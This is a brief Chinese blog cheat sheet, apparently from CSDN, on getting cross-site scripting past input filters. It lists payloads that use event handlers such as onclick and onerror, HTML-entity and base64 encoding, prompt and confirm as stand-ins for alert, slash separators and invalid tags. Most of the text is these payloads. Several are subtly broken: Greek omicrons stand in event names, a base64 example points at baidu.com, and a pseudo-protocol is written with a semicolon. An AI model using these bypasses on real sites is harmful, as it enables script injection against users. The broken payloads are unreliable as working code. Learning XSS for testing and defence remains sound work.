XSS绕过

1.<>(左右尖括号)被过滤

可以构造一些事件进行触发alert(1)

如 input标签的onclick事件 点击事件等

“ οnclick=alert(1)          (" 用于闭合value等属性)

不同标签的不同事件,大多为on属性

2.alert被过滤

(1).编码(url,base64等编码)

<a href=https://www.baidu.com;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==>

表示<script>alert(1)</script>

<a href=j&#x61;v&#97script&#x3A;&#97lert(1)>M

表示js伪协议  javascript;alert(1)

(2)prompt和confirm代替

3.其他
部分空格被过滤

标签和属性之间不是只能用空格

<img/src=x οnerrοr=alert(1)>

有时候可以使用不合法的标签

<M οnclick=alert(1)>M

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值